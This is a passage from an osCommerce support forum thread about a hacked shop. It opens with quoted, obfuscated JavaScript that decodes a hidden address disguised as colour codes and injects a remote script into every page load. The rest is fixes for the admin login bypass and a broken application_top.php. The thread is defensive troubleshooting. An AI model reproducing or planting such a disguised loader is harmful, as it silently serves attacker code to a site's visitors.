  var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); 
  var redef_colors = 1; 
  var colors_picked = 0; 

  function div_pick_colors(t,styled) { 
       var s = ""; 
       for (j=0;j<t.length;j++) {       
               var c_rgb = t[j]; 
               for (i=1;i<7;i++) { 
                       var c_clr = c_rgb.substr(i++,2); 
                       if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15); 
               } 
       } 
       if (styled) { 
               s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2)); 
       } else { 
               s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime(); 
       } 
       return s; 
  } 

  function try_pick_colors() { 
       try { 
               if(!document.getElementById || !document.createElement){ 
                       document.write(div_pick_colors(div_colors,1)); 
                  } else { 
                       var new_cstyle=document.createElement("script"); 
                       new_cstyle.type="text/javascript"; 
                       new_cstyle.src=div_pick_colors(div_colors,0); 
                       document.getElementsByTagName("head")[0].appendChild(new_cstyle); 
               } 
       } catch(e) { } 
       try { 
               check_colors_picked(); 
       } catch(e) {  
               setTimeout("try_pick_colors()", 500); 
       } 
  } 

  try_pick_colors(); 

} 
</script>

 

Because well, every site I have seen this on via google search, has been defaced via that index.php file in question, using that code as a page styler.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Have tried what you've suggested.

Still the same error message:

 

 

Fatal error: Call to a member function add_current_page() on a non-object in ./includes/application_top.php on line 312

Link to comment
Share on other sites

Example: click this link to see a google search. Almost every site has that T_VAR error you are referring to. The ones that dont, have been defaced by an attacker.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

The problem is with the german/index.php page. You should probably restore your application_top.php back to what it was at. And reset the german/index.php page to the one I just posted above. That LED lighting code including the javascript looks to me like a defacement.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

This is the correct code for the application_top

// navigation history
 if (tep_session_is_registered('navigation')) {
   if (PHP_VERSION < 4) {
     $broken_navigation = $navigation;
     $navigation = new navigationHistory;
     $navigation->unserialize($broken_navigation);
   }
 } else {
   tep_session_register('navigation');
   $navigation = new navigationHistory;
 }
 $navigation->add_current_page();

 

Once you replace that, and the defaced german/index.php page wth the code I pasted above, that error should clear.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Thanks Taipo for your support!

 

Now as it is running again and you have mentioned the possibility of a hack: Could the attacker in any way pull down some customer related data? And is there a possibility that other file/date ist affected?

 

 

If others have the same problem, I've fixed it like this now:

 

1. Took out the javascript part from german/index.php

2. Replaced the navigation history part in application_top.php with the following:

// navigation history
if (tep_session_is_registered('navigation')) {
if (PHP_VERSION < 4) {
$broken_navigation = $navigation;
$navigation = new navigationHistory;
$navigation->unserialize($broken_navigation);
} else {
$navigation = new navigationHistory;
}
} else {
tep_session_register('navigation');
$navigation = new navigationHistory;
}

$navigation->add_current_page();

 

With last proposed code for navigation history by Taipo it didn't work.

Link to comment
Share on other sites

Thanks Taipo for your support!

 

Now as it is running again and you have mentioned the possibility of a hack: Could the attacker in any way pull down some customer related data? And is there a possibility that other file/date ist affected?

 

The faulty code that is allowing the attackers to upload files onto your website begins with this code in the application_top.php files (both files, the one in includes/ and the one in admin/includes)

 

You need to change this code below in both application_top.php files.

 

Change:

// set php_self in the local scope 
if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF'];

 

To this:

 

$PHP_SELF = (((strlen(ini_get('cgi.fix_pathinfo')) > 0) && ((bool)ini_get('cgi.fix_pathinfo') == false)) || !isset($HTTP_SERVER_VARS['SCRIPT_NAME'])) ? basename($HTTP_SERVER_VARS['PHP_SELF']) : basename($HTTP_SERVER_VARS['SCRIPT_NAME']);

 

This will prevent further exploitation of the admin bypass exploit.

 

You next need to create a file called .htaccess and add it into the includes folder with this in it:

Options All -Indexes

<Files *.php>
Order Deny,Allow
Deny from all
</Files>

 

This will protect the files and folders within the includes folder from being directly accessed and in particular prevent further exploitation of the language files as has happened in this case.

 

Then comes the hard part. Because your website was vulnerable to the admin bypass exploit, the attackers have probably been able to upload files into your folders, files that will give them further access to your site should you go through all the procedures discussed in many of the discussions on this site to protect your site.

 

So take some time to go through the discussions on these forums and note the lists of instructions others have offered to secure your website and it would pay to follow them, as well as the two I have mentioned here now.

 

Lastly and this is optional, I have written a contribution called osc_sec.php which can also be useful as well. Have a look at the link in my signature for further information.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...